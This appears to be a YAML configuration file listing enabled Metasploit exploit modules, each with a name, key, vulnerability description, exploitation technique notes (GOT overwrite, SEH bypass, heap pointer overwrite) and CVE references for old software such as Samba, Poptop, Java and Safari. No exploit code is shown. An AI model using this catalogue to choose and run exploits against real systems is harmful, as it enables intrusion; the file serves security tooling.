- - CVE
- 2006-1148
- - OSVDB
- "23777"
- - BID
- "17040"
- - URL
- http://www.infigo.hr/in_focus/INFIGO-2006-03-01
path: extensions/metasploit/
class: Msf_module
msf_poptop_negative_read:
enable: true
msf: true
msf_key: linux/pptp/poptop_negative_read
name: Poptop Negative Read Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the Poptop negative read overflow. This will\n\
\t\t\t\twork against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I\n\
\t\t\t\tcurrently do not have a good way to detect Poptop versions.\n\n\
\t\t\t\tThe server will by default only allow 4 concurrent manager processes\n\
\t\t\t\t(what we run our code in), so you could have a max of 4 shells at once.\n\n\
\t\t\t\tUsing the current method of exploitation, our socket will be closed\n\
\t\t\t\tbefore we have the ability to run code, preventing the use of Findsock.\n\
\t\t\t"
authors:
- - CVE
- 2003-0213
- - OSVDB
- "3293"
- - URL
- http://securityfocus.com/archive/1/317995
- - URL
- http://www.freewebs.com/blightninjas/
path: extensions/metasploit/
class: Msf_module
msf_cyrus_pop3d_popsubfolders:
enable: true
msf: true
msf_key: linux/pop3/cyrus_pop3d_popsubfolders
name: Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit takes advantage of a stack based overflow. Once the stack\n\
\t\t\t\tcorruption has occurred, it is possible to overwrite a pointer which is\n\
\t\t\t\tlater used for a memcpy. This gives us a write anything anywhere condition\n\
\t\t\t\tsimilar to a format string vulnerability.\n\n\
\t\t\t\tNOTE: The popsubfolders option is a non-default setting.\n\n\
\t\t\t\tI chose to overwrite the GOT with my shellcode and return to it. This\n\
\t\t\t\tdefeats the VA random patch and possibly other stack protection features.\n\n\
\t\t\t\tTested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with\n\
\t\t\t\ta version containing the vulnerable code, it is not exploitable due to the\n\
\t\t\t\tuse of the FORTIFY_SOURCE compiler enhancement.\n\
\t\t\t"
authors:
- - CVE
- 2006-2502
- - OSVDB
- "25853"
- - BID
- "18056"
- - URL
- http://www.exploit-db.com/exploits/2053
- - URL
- http://www.exploit-db.com/exploits/2185
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html
path: extensions/metasploit/
class: Msf_module
msf_madwifi_giwscan_cb:
enable: true
msf: true
msf_key: linux/madwifi/madwifi_giwscan_cb
name: Madwifi SIOCGIWSCAN Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe Madwifi driver under Linux is vulnerable to a remote kernel-mode\n\
\t\t\t\tstack-based buffer overflow.\n\n\
\t\t\t\tThe vulnerability is triggered by one of these properly crafted\n\
\t\t\t\tinformation elements: WPA, RSN, WME and Atheros OUI. The current madwifi\n\
\t\t\t\tdriver (0.9.2) and all madwifi-ng drivers since r1504 are\n\
\t\t\t\tvulnerable.\n\n\
\t\t\t\tMadwifi 0.9.2.1 release corrects the issue.\n\n\
\t\t\t\tThis module has been tested against Ubuntu 6.10 and is 100% reliable,\n\
\t\t\t\tdoesn't crash the Wifi stack and can exploit the same machine multiple\n\
\t\t\t\ttimes without the need to reboot it.\n\n\
\t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux\n\
\t\t\t\tplatform with a supported wireless card. Please see the Ruby Lorcon2\n\
\t\t\t\tdocumentation (external/ruby-lorcon/README) for more information.\n\
\t\t\t"
authors:
- - CVE
- 2006-6332
- - OSVDB
- "31267"
- - URL
- http://www.madwifi.org
path: extensions/metasploit/
class: Msf_module
msf_chain_reply:
enable: true
msf: true
msf_key: linux/samba/chain_reply
name: Samba chain_reply Memory Corruption (Linux x86)
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a memory corruption vulnerability present in Samba versions\n\
\t\t\t\tprior to 3.3.13. When handling chained response packets, Samba fails to validate\n\
\t\t\t\tthe offset value used when building the next part. By setting this value to a\n\
\t\t\t\tnumber larger than the destination buffer size, an attacker can corrupt memory.\n\
\t\t\t\tAdditionally, setting this value to a value smaller than 'smb_wct' (0x24) will\n\
\t\t\t\tcause the header of the input buffer chunk to be corrupted.\n\n\
\t\t\t\tAfter close inspection, it appears that 3.0.x versions of Samba are not\n\
\t\t\t\texploitable. Since they use an \"InputBuffer\" size of 0x20441, an attacker cannot\n\
\t\t\t\tcause memory to be corrupted in an exploitable way. It is possible to corrupt the\n\
\t\t\t\theap header of the \"InputBuffer\", but it didn't seem possible to get the chunk\n\
\t\t\t\tto be processed again prior to process exit.\n\n\
\t\t\t\tIn order to gain code execution, this exploit attempts to overwrite a \"talloc\n\
\t\t\t\tchunk\" destructor function pointer.\n\n\
\t\t\t\tThis particular module is capable of exploiting the flaw on x86 Linux systems\n\
\t\t\t\tthat do not have the nx memory protection.\n\n\
\t\t\t\tNOTE: It is possible to make exploitation attempts indefinitely since Samba forks\n\
\t\t\t\tfor user sessions in the default configuration.\n\
\t\t\t"
authors:
- - CVE
- 2010-2063
- - OSVDB
- "65518"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=873
path: extensions/metasploit/
class: Msf_module
msf_snortbopre:
enable: true
msf: true
msf_key: linux/ids/snortbopre
name: Snort Back Orifice Pre-Preprocessor Remote Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Back Orifice pre-processor module\n\
\t\t\t\tincluded with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could\n\
\t\t\t\tbe used to completely compromise a Snort sensor, and would typically gain an attacker\n\
\t\t\t\tfull root or administrative privileges.\n\
\t\t\t"
authors:
- - CVE
- 2005-3252
- - OSVDB
- "20034"
- - BID
- "15131"
- - URL
- http://xforce.iss.net/xforce/alerts/id/207
path: extensions/metasploit/
class: Msf_module
msf_ut2004_secure:
enable: true
msf: true
msf_key: windows/games/ut2004_secure
name: Unreal Tournament 2004 "secure" Overflow (Win32)
category: Metasploit
description: "\n\n\
\t\t\tThis is an exploit for the GameSpy secure query in\n\
\t\t\tthe Unreal Engine.\n\n\
\t\t\tThis exploit only requires one UDP packet, which can\n\
\t\t\tbe both spoofed and sent to a broadcast address.\n\
\t\t\tUsually, the GameSpy query server listens on port 7787,\n\
\t\t\tbut you can manually specify the port as well.\n\n\
\t\t\tThe RunServer.sh script will automatically restart the\n\
\t\t\tserver upon a crash, giving us the ability to\n\
\t\t\tbruteforce the service and exploit it multiple\n\
\t\t\ttimes.\n\n\
\t\t\t"
authors:
- - CVE
- 2004-0608
- - OSVDB
- "7217"
- - BID
- "10570"
path: extensions/metasploit/
class: Msf_module
msf_upnp_location:
enable: true
msf: true
msf_key: osx/mdns/upnp_location
name: Mac OS X mDNSResponder UPnP Location Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow that occurs when processing\n\
\t\t\t\tspecially crafted requests sent to mDNSResponder. All Mac OS X systems\n\
\t\t\t\tbetween version 10.4 and 10.4.9 (without the 2007-005 patch) are\n\
\t\t\t\taffected.\n\
\t\t\t"
authors:
- - OSVDB
- "35142"
- - CVE
- 2007-2386
- - BID
- "24144"
- - URL
- http://support.apple.com/kb/TA24732
path: extensions/metasploit/
class: Msf_module
msf_ufo_ai:
enable: true
msf: true
msf_key: windows/misc/ufo_ai
name: "UFO: Alien Invasion IRC Client Buffer Overflow Exploit"
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the IRC client component of\n\
\t\t\t\tUFO: Alien Invasion 2.2.1.\n\
\t\t\t"
authors:
- - OSVDB
- "65689"
- - URL
- http://www.exploit-db.com/exploits/14013
path: extensions/metasploit/
class: Msf_module
msf_safari_libtiff:
enable: true
msf: true
msf_key: osx/armle/safari_libtiff
name: iPhone MobileSafari LibTIFF Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the version of\n\
\t\t\t\tlibtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n\
\t\t\t\t1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n\
\t\t\t\ttools installed will need to use a special payload.\n\
\t\t\t"
authors:
- - CVE
- 2006-3459
- - OSVDB
- "27723"
- - BID
- "19283"
path: extensions/metasploit/
class: Msf_module
msf_safari_metadata_archive:
enable: true
msf: true
msf_key: osx/browser/safari_metadata_archive
name: Safari Archive Metadata Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Safari's \"Safe file\" feature, which will\n\
\t\t\t\tautomatically open any file with one of the allowed extensions. This can be abused\n\
\t\t\t\tby supplying a zip file, containing a shell script, with a metafile indicating\n\
\t\t\t\tthat the file should be opened by Terminal.app. This module depends on\n\
\t\t\t\tthe 'zip' command-line utility.\n\
\t\t\t"
authors:
- - CVE
- 2006-0848
- - OSVDB
- "23510"
- - BID
- "16736"
path: extensions/metasploit/
class: Msf_module
msf_software_update:
enable: true
msf: true
msf_key: osx/browser/software_update
name: Apple OS X Software Update Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a feature in the Distribution Packages,\n\
\t\t\t\twhich are used in the Apple Software Update mechanism. This feature\n\
\t\t\t\tallows for arbitrary command execution through JavaScript. This exploit\n\
\t\t\t\tprovides the malicious update server. Requests must be redirected to\n\
\t\t\t\tthis server by other means for this exploit to work.\n\
\t\t\t"
authors:
- - CVE
- 2007-5863
- - OSVDB
- "40722"
path: extensions/metasploit/
class: Msf_module
msf_webstar_ftp_user:
enable: true
msf: true
msf_key: osx/ftp/webstar_ftp_user
name: WebSTAR FTP Server USER Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the logging routine\n\
\t\t\t\tof the WebSTAR FTP server. Reliable code execution is\n\
\t\t\t\tobtained by a series of hops through the System library.\n\
\t\t\t"
authors:
- - CVE
- 2004-0695
- - OSVDB
- "7794"
- - BID
- "10720"
path: extensions/metasploit/
class: Msf_module
msf_loginext:
enable: true
msf: true
msf_key: osx/afp/loginext
name: AppleFileServer LoginExt PathName Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the AppleFileServer service\n\
\t\t\t\ton MacOS X. This vulnerability was originally reported by Atstake and\n\
\t\t\t\twas actually one of the few useful advisories ever published by that\n\
\t\t\t\tcompany. You only have one chance to exploit this bug.\n\
\t\t\t\tThis particular exploit uses a stack-based return address that will\n\
\t\t\t\tonly work under optimal conditions.\n\
\t\t\t"
authors:
- - CVE
- 2004-0430
- - OSVDB
- "5762"
- - BID
- "10271"
path: extensions/metasploit/
class: Msf_module
msf_evocam_webserver:
enable: true
msf: true
msf_key: osx/http/evocam_webserver
name: MacOS X EvoCam HTTP GET Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the web server provided with the EvoCam\n\
\t\t\t\tprogram for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload\n\
\t\t\t\tfrom the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,\n\
\t\t\t\t3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.\n\
\t\t\t"
authors:
- - CVE
- 2010-2309
- - OSVDB
- "65043"
- - URL
- http://www.exploit-db.com/exploits/12835
path: extensions/metasploit/
class: Msf_module
msf_type77:
enable: true
msf: true
msf_key: windows/arkeia/type77
name: Arkeia Backup Client Type 77 Overflow (Win32)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Arkeia backup\n\
\t\t\t\tclient for the Windows platform. This vulnerability affects\n\
\t\t\t\tall versions up to and including 5.3.3.\n\
\t\t\t"
authors:
- - CVE
- 2005-0491
- - OSVDB
- "14011"
- - BID
- "12594"
- - URL
- http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html
path: extensions/metasploit/
class: Msf_module
msf_quicktime_rtsp_content_type:
enable: true
msf: true
msf_key: osx/rtsp/quicktime_rtsp_content_type
name: MacOS X QuickTime RTSP Content-Type Overflow
category: Metasploit
description: No module description
authors:
- - CVE
- 2007-6166
- - OSVDB
- "40876"
- - BID
- "26549"
path: extensions/metasploit/
class: Msf_module
msf_mailapp_image_exec:
enable: true
msf: true
msf_key: osx/email/mailapp_image_exec
name: Mail.app Image Attachment Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command execution vulnerability in the\n\
\t\t\t\tMail.app application shipped with Mac OS X 10.5.0. This flaw was\n\
\t\t\t\tpatched in 10.4 in March of 2007, but reintroduced into the final\n\
\t\t\t\trelease of 10.5.\n\
\t\t\t"
authors:
- - CVE
- 2006-0395
- - CVE
- 2007-6165
- - OSVDB
- "40875"
- - BID
- "26510"
- - BID
- "16907"
path: extensions/metasploit/
class: Msf_module
msf_mobilemail_libtiff:
enable: true
msf: true
msf_key: osx/email/mobilemail_libtiff
name: iPhone MobileMail LibTIFF Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the version of\n\
\t\t\t\tlibtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n\
\t\t\t\t1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n\
\t\t\t\ttools installed will need to use a special payload.\n\
\t\t\t"
authors:
- - CVE
- 2006-3459
- - OSVDB
- "27723"
- - BID
- "19283"
path: extensions/metasploit/
class: Msf_module
msf_manyargs:
enable: true
msf: true
msf_key: dialup/multi/login/manyargs
name: System V Derived /bin/login Extraneous Arguments Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit connects to a system's modem over dialup and exploits\n\
\t\t\t\ta buffer overflow vulnerability in its System V derived /bin/login.\n\
\t\t\t\tThe vulnerability is triggered by providing a large number of arguments.\n\
\t\t\t"
authors:
- - CVE
- 2001-0797
- - OSVDB
- "690"
- - OSVDB
- "691"
- - BID
- "3681"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html
path: extensions/metasploit/
class: Msf_module
msf_mercantec_softcart:
enable: true
msf: true
msf_key: bsdi/softcart/mercantec_softcart
name: Mercantec SoftCart CGI Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis is an exploit for an undisclosed buffer overflow\n\
\t\t\t\tin the SoftCart.exe CGI as shipped with Mercantec's shopping\n\
\t\t\t\tcart software. It is possible to execute arbitrary code\n\
\t\t\t\tby passing a malformed CGI parameter in an HTTP GET\n\
\t\t\t\trequest. This issue is known to affect SoftCart version\n\
\t\t\t\t4.00b.\n\
\t\t\t"
authors:
- - CVE
- 2004-2221
- - OSVDB
- "9011"
- - BID
- "10926"
path: extensions/metasploit/
class: Msf_module
msf_hagent_untrusted_hsdata:
enable: true
msf: true
msf_key: multi/wyse/hagent_untrusted_hsdata
name: Wyse Rapport Hagent Fake Hserver Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the Wyse Rapport Hagent service by pretending to\n\
\t\t\t\tbe a legitimate server. This process involves starting both HTTP and\n\
\t\t\t\tFTP services on the attacker side, then contacting the Hagent service of\n\
\t\t\t\tthe target and indicating that an update is available. The target will\n\
\t\t\t\tthen download the payload wrapped in an executable from the FTP service.\n\
\t\t\t"
authors:
- - CVE
- 2009-0695
- - OSVDB
- "55839"
- - US-CERT-VU
- "654545"
- - URL
- http://snosoft.blogspot.com/
- - URL
- http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/
- - URL
- http://www.wyse.com/serviceandsupport/support/WSB09-01.zip
- - URL
- http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf
path: extensions/metasploit/
class: Msf_module
msf_java_rmi_server:
enable: true
msf: true
msf_key: multi/misc/java_rmi_server
name: Java RMI Server Insecure Default Configuration Java Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module takes advantage of the default configuration of the RMI Registry and\n\
\t\t\t\tRMI Activation services, which allow loading classes from any remote (HTTP) URL. As it\n\
\t\t\t\tinvokes a method in the RMI Distributed Garbage Collector which is available via every\n\
\t\t\t\tRMI endpoint, it can be used against both rmiregistry and rmid, and against most other\n\
\t\t\t\t(custom) RMI endpoints as well.\n\n\
\t\t\t\t\tNote that it does not work against Java Management Extension (JMX) ports since those do\n\
\t\t\t\tnot support remote class loading, unless another RMI endpoint is active in the same\n\
\t\t\t\tJava process.\n\
\t\t\t\t\n\
\t\t\t\t\tRMI method calls do not support or require any sort of authentication.\n\
\t\t\t"
authors:
- - URL
- http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html
path: extensions/metasploit/
class: Msf_module
msf_wireshark_lwres_getaddrbyname:
enable: true
msf: true
msf_key: multi/misc/wireshark_lwres_getaddrbyname
name: Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\n\
\t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\n\
\t\t\t\toverflow. This bug was found and reported by babi.\n\n\
\t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\n\
\t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\n\n\
\t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\n\
\t\t\t\texploitation via the return address on the stack. Sending a larger string allows\n\
\t\t\t\texploitation using the SEH bypass method. However, this packet will usually get\n\
\t\t\t\tfragmented, which may cause additional complications.\n\n\
\t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\n\
\t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\n\
\t\t\t\texploit this issue.\n\
\t\t\t"
authors:
- - CVE
- 2010-0304
- - OSVDB
- "61987"
- - BID
- "37985"
- - URL
- http://www.wireshark.org/security/wnpa-sec-2010-02.html
- - URL
- http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h
path: extensions/metasploit/
class: Msf_module
msf_wireshark_lwres_getaddrbyname_loop:
enable: true
msf: true
msf_key: multi/misc/wireshark_lwres_getaddrbyname_loop
name: Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
category: Metasploit
description: "\n\
\t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\n\
\t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\n\
\t\t\t\toverflow. This bug was found and reported by babi.\n\n\
\t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\n\
\t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\n\n\
\t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\n\
\t\t\t\texploitation via the return address on the stack. Sending a larger string allows\n\
\t\t\t\texploitation using the SEH bypass method. However, this packet will usually get\n\
\t\t\t\tfragmented, which may cause additional complications.\n\n\
\t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\n\
\t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\n\
\t\t\t\texploit this issue.\n\n\
\t\t\t\tThis version loops, sending the packet every X seconds until the job is killed.\n\
\t\t\t"
authors:
- - CVE
- 2010-0304
- - OSVDB
- "61987"
- - BID
- "37985"
- - URL
- http://www.wireshark.org/security/wnpa-sec-2010-02.html
- - URL
- http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h
path: extensions/metasploit/
class: Msf_module
msf_veritas_netbackup_cmdexec:
enable: true
msf: true
msf_key: multi/misc/veritas_netbackup_cmdexec
name: VERITAS NetBackup Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows arbitrary command execution on an\n\
\t\t\t\tephemeral port opened by Veritas NetBackup, whilst an\n\
\t\t\t\tadministrator is authenticated. The port is opened and\n\
\t\t\t\tallows direct console access as root or SYSTEM from\n\
\t\t\t\tany source address.\n\
\t\t\t"
authors:
- - CVE
- 2004-1389
- - OSVDB
- "11026"
- - BID
- "11494"
- - URL
- http://seer.support.veritas.com/docs/271727.htm
path: extensions/metasploit/
class: Msf_module
msf_openview_omniback_exec:
enable: true
msf: true
msf_key: multi/misc/openview_omniback_exec
name: HP OpenView OmniBack II Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module uses a vulnerability in the OpenView Omniback II\n\
\t\t\t\tservice to execute arbitrary commands. This vulnerability was\n\
\t\t\t\tdiscovered by DiGiT and his code was used as the basis for this\n\
\t\t\t\tmodule.\n\n\
\t\t\t\tFor Microsoft Windows targets, due to module limitations, use the\n\
\t\t\t\t\"unix/cmd/generic\" payload and set CMD to your command. You can only\n\
\t\t\t\tpass a small number of characters (4) to the command line on Windows.\n\
\t\t\t"
authors:
- - CVE
- 2001-0311
- - OSVDB
- "6018"
- - BID
- "11032"
- - URL
- http://www.securiteam.com/exploits/6M00O150KG.html
path: extensions/metasploit/
class: Msf_module
msf_zend_java_bridge:
enable: true
msf: true
msf_key: multi/misc/zend_java_bridge
name: Zend Server Java Bridge Arbitrary Java Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module takes advantage of a trust relationship issue within the\n\
\t\t\t\tZend Server Java Bridge. The Java Bridge is responsible for handling interactions\n\
\t\t\t\tbetween PHP and Java code within Zend Server. \n\
\t\t\t\t\n\
\t\t\t\t\tWhen Java code is encountered Zend Server communicates with the Java Bridge. The\n\
\t\t\t\tJava Bridge then handles the java code and creates the objects within the Java Virtual\n\
\t\t\t\tMachine. This interaction however, does not require any sort of authentication. This\n\
\t\t\t\tleaves the JVM wide open to remote attackers. Sending specially crafted data to the\n\
\t\t\t\tJava Bridge results in the execution of arbitrary java code.\n\
\t\t\t"
authors:
- - OSVDB
- "71420"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-113/
- - URL
- http://www.exploit-db.com/exploits/17078/
path: extensions/metasploit/
class: Msf_module
msf_php_unserialize_zval_cookie:
enable: true
msf: true
msf_key: multi/php/php_unserialize_zval_cookie
name: PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an integer overflow vulnerability in the unserialize()\n\
\t\t\t\tfunction of the PHP web server extension. This vulnerability was patched by\n\
\t\t\t\tStefan Esser in version 4.4.5 and applies to all previous versions supporting this function.\n\
\t\t\t\tThis particular module targets numerous web applications and is based on the proof\n\
\t\t\t\tof concept provided by Stefan Esser. This vulnerability requires approximately 900k\n\
\t\t\t\tof data to trigger due to the multiple Cookie headers requirement. Since we\n\
\t\t\t\tare already assuming a fast network connection, we use a 2MB block of shellcode for\n\
\t\t\t\tthe brute force, allowing quick exploitation for those with fast networks.\n\n\
\t\t\t\tOne of the neat things about this vulnerability is that on x86 systems, the EDI register points\n\
\t\t\t\tinto the beginning of the hashtable string. This can be used with an egghunter to\n\
\t\t\t\tquickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction\n\
\t\t\t\tis known. The EDI method is faster, but the bandwidth-intensive brute force used by this\n\
\t\t\t\tmodule is more reliable across a wider range of systems.\n\
\t\t\t"
authors:
- - CVE
- 2007-1286
- - OSVDB
- "32771"
- - URL
- http://www.php-security.org/MOPB/MOPB-04-2007.html
path: extensions/metasploit/
class: Msf_module
msf_qtjava_pointer:
enable: true
msf: true
msf_key: multi/browser/qtjava_pointer
name: Apple QTJava toQTPointer() Arbitrary Memory Access
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits an arbitrary memory access vulnerability in the\n\
\t\t\tQuicktime for Java API provided with Quicktime 7.\n\n\
\t\t\t"
authors:
- - CVE
- 2007-2175
- - OSVDB
- "34178"
- - BID
- "23608"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-07-023.html
path: extensions/metasploit/
class: Msf_module
msf_java_signed_applet:
enable: true
msf: true
msf_key: multi/browser/java_signed_applet
name: Java Signed Applet Social Engineering Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit dynamically creates a .jar file via the\n\
\t\t\t\tMsf::Exploit::Java mixin, then signs it. The resulting\n\
\t\t\t\tsigned applet is presented to the victim via a web page with\n\
\t\t\t\tan applet tag. The victim's JVM will pop a dialog asking if\n\
\t\t\t\tthey trust the signed applet.\n\
\t\t\t\t\n\
\t\t\t\tOn older versions the dialog will display the value of CERTCN\n\
\t\t\t\tin the \"Publisher\" line. Newer JVMs display \"UNKNOWN\" when the\n\
\t\t\t\tsignature is not trusted (i.e., it's not signed by a trusted\n\
\t\t\t\tCA). The SigningCert option allows you to provide a trusted\n\
\t\t\t\tcode signing cert, the values in which will override CERTCN.\n\
\t\t\t\tIf SigningCert is not given, a randomly generated self-signed\n\
\t\t\t\tcert will be used.\n\n\
\t\t\t\tEither way, once the user clicks \"run\", the applet executes\n\
\t\t\t\twith full user permissions.\n\
\t\t\t"
authors:
- - URL
- http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf
- - URL
- http://www.spikezilla-software.com/blog/?p=21
path: extensions/metasploit/
class: Msf_module
msf_opera_historysearch:
enable: true
msf: true
msf_key: multi/browser/opera_historysearch
name: Opera historysearch XSS
category: Metasploit
description: "\n\
\t\t\t\t\tCertain constructs are not escaped correctly by Opera's History\n\
\t\t\t\tSearch results. These can be used to inject scripts into the\n\
\t\t\t\tpage, which can then be used to modify configuration settings\n\
\t\t\t\tand execute arbitrary commands. Affects Opera versions between\n\
\t\t\t\t9.50 and 9.61.\n\
\t\t\t"
authors:
- - CVE
- 2008-4696
- - OSVDB
- "49472"
- - BID
- "31869"
- - URL
- http://www.opera.com/support/kb/view/903/
path: extensions/metasploit/
class: Msf_module
msf_java_trusted_chain:
enable: true
msf: true
msf_key: multi/browser/java_trusted_chain
name: Java Statement.invoke() Trusted Method Chain Exploit
category: Metasploit
description: "\n\
\t\t\tThis module exploits a vulnerability in Java Runtime Environment\n\
\t\t\tthat allows an untrusted method to run in a privileged context. The\n\
\t\t\tvulnerability affects version 6 prior to update 19 and version 5\n\
\t\t\tprior to update 23.\n\
\t\t\t"
authors:
- - CVE
- 2010-0840
- - OSVDB
- "63483"
- - URL
- http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-trusted-method-chaining-cve-2010.html
path: extensions/metasploit/
class: Msf_module
msf_firefox_escape_retval:
enable: true
msf: true
msf_key: multi/browser/firefox_escape_retval
name: Firefox 3.5 escape() Return Value Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory corruption vulnerability in the Mozilla\n\
\t\t\t\tFirefox browser. This flaw occurs when a bug in the javascript interpreter\n\
\t\t\t\tfails to preserve the return value of the escape() function and results in\n\
\t\t\t\tuninitialized memory being used instead. This module has only been tested\n\
\t\t\t\ton Windows, but should work on other platforms as well with the current\n\
\t\t\t\ttargets.\n\
\t\t\t"
authors:
- - CVE
- 2009-2477
- - OSVDB
- "55846"
- - BID
- "35660"
- - URL
- https://bugzilla.mozilla.org/show_bug.cgi?id=503286
path: extensions/metasploit/
class: Msf_module
msf_opera_configoverwrite:
enable: true
msf: true
msf_key: multi/browser/opera_configoverwrite
name: Opera 9 Configuration Overwrite
category: Metasploit
description: "\n\
\t\t\t\tOpera web browser in versions <= 9.10 allows unrestricted script\n\
\t\t\t\taccess to its configuration page, opera:config, allowing an\n\
\t\t\t\tattacker to change settings and potentially execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - OSVDB
- "66472"
path: extensions/metasploit/
class: Msf_module
msf_java_setdifficm_bof:
enable: true
msf: true
msf_key: multi/browser/java_setdifficm_bof
name: Sun Java JRE AWT setDiffICM Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a flaw in the setDiffICM function in the Sun JVM.\n\n\
\t\t\t\tThe payload is serialized and passed to the applet via PARAM tags. It must be\n\
\t\t\t\ta native payload.\n\n\
\t\t\t\tThe affected Java versions are JDK and JRE 6 Update 16 and earlier,\n\
\t\t\t\tJDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\n\
\t\t\t\tearlier, and SDK and JRE 1.3.1_26 and earlier.\n\n\
\t\t\t\tNOTE: Although all of the above versions are reportedly vulnerable, only\n\
\t\t\t\t1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.\n\
\t\t\t"
authors:
- - CVE
- 2009-3869
- - OSVDB
- "59710"
- - BID
- "36881"
- - URL
- http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-078/
path: extensions/metasploit/
class: Msf_module
msf_java_calendar_deserialize:
enable: true
msf: true
msf_key: multi/browser/java_calendar_deserialize
name: Sun Java Calendar Deserialization Exploit
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.\n\n\
\t\t\t\tThe payload can be either a native payload which is generated as an executable and\n\
\t\t\t\tdropped/executed on the target or a shell from within the Java applet in the target browser.\n\n\
\t\t\t\tThe affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16\n\
\t\t\t\tand earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).\n\
\t\t\t"
authors:
- - CVE
- 2008-5353
- - OSVDB
- "50500"
- - URL
- http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html
- - URL
- http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html
- - URL
- http://blog.cr0.org/2009/05/write-once-own-everyone.html
- - URL
- http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1
path: extensions/metasploit/
class: Msf_module
